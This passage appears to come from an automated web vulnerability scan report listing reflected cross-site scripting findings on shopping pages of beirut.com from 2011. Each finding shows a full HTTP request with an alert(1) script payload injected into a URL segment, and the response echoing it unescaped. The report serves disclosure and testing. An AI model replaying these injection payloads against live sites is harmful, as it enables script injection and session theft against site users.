Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods/235690923/Sporting-Goods-Attire/4519a4a'-alert(1)-'923d354c1e8';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.925. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4b55"><a>662bc127f70 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppinge4b55"><a>662bc127f70/Consumer-Goods/235690923/Sweets-Chocolates/79 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:32:07 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppinge4b55"><a>662bc127f70">
...[SNIP]...

4.926. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 90075'-alert(1)-'1d113cd68f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping90075'-alert(1)-'1d113cd68f2/Consumer-Goods/235690923/Sweets-Chocolates/79 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:40:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping90075'-alert(1)-'1d113cd68f2/Consumer-Goods/235690923/Sweets-Chocolates/79';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.927. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 607ad'-alert(1)-'58a213e0e14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods607ad'-alert(1)-'58a213e0e14/235690923/Sweets-Chocolates/79 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Consumer-Goods607ad'-alert(1)-'58a213e0e14/235690923/Sweets-Chocolates/79';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.928. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d2b42<script>alert(1)</script>eadeef755ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goodsd2b42<script>alert(1)</script>eadeef755ae/235690923/Sweets-Chocolates/79 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:49:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goodsd2b42<script>alert(1)</script>eadeef755ae <a href="#" id="backlink">
...[SNIP]...

4.929. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb469'-alert(1)-'bb51917a62b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923cb469'-alert(1)-'bb51917a62b/Sweets-Chocolates/79 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:54:10 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Consumer-Goods/235690923cb469'-alert(1)-'bb51917a62b/Sweets-Chocolates/79';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.930. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c9a7'-alert(1)-'6b44c7307f5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Sweets-Chocolates9c9a7'-alert(1)-'6b44c7307f5/79 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:58:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods/235690923/Sweets-Chocolates9c9a7'-alert(1)-'6b44c7307f5/79';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.931. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Sweets-Chocolates/79

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b77f'-alert(1)-'a9c7223a7f7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Sweets-Chocolates/795b77f'-alert(1)-'a9c7223a7f7 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:03:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Consumer-Goods/235690923/Sweets-Chocolates/795b77f'-alert(1)-'a9c7223a7f7';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.932. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Tobacconist/29

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e832c'-alert(1)-'52bb2385ac2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppinge832c'-alert(1)-'52bb2385ac2/Consumer-Goods/235690923/Tobacconist/29 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:36:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shoppinge832c'-alert(1)-'52bb2385ac2/Consumer-Goods/235690923/Tobacconist/29';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.933. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Tobacconist/29

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57c3a"><a>c11e6e3cec5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping57c3a"><a>c11e6e3cec5/Consumer-Goods/235690923/Tobacconist/29 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:25:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping57c3a"><a>c11e6e3cec5">
...[SNIP]...

4.934. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Tobacconist/29

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1064d'-alert(1)-'32dc8d23c03 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods1064d'-alert(1)-'32dc8d23c03/235690923/Tobacconist/29 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:43:10 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods1064d'-alert(1)-'32dc8d23c03/235690923/Tobacconist/29';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.935. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Tobacconist/29

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d621b<script>alert(1)</script>1d1f7d4de41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Consumer-Goodsd621b<script>alert(1)</script>1d1f7d4de41/235690923/Tobacconist/29 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:43:25 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55221

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Consumer Goodsd621b<script>alert(1)</script>1d1f7d4de41 <a href="#" id="backlink">
...[SNIP]...

4.936. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Tobacconist/29

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4173'-alert(1)-'62e52d4dd2d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923c4173'-alert(1)-'62e52d4dd2d/Tobacconist/29 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:47:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Consumer-Goods/235690923c4173'-alert(1)-'62e52d4dd2d/Tobacconist/29';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.937. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Tobacconist/29 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Consumer-Goods/235690923/Tobacconist/29

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53d93'-alert(1)-'80b6f4fab88 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Consumer-Goods/235690923/Tobacconist53d93'-alert(1)-'80b6f4fab88/29 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:54:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55041

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Consumer-Goods/235690923/Tobacconist53d93'-alert(1)-'80b6f4fab88/29';
var initfacebox='';
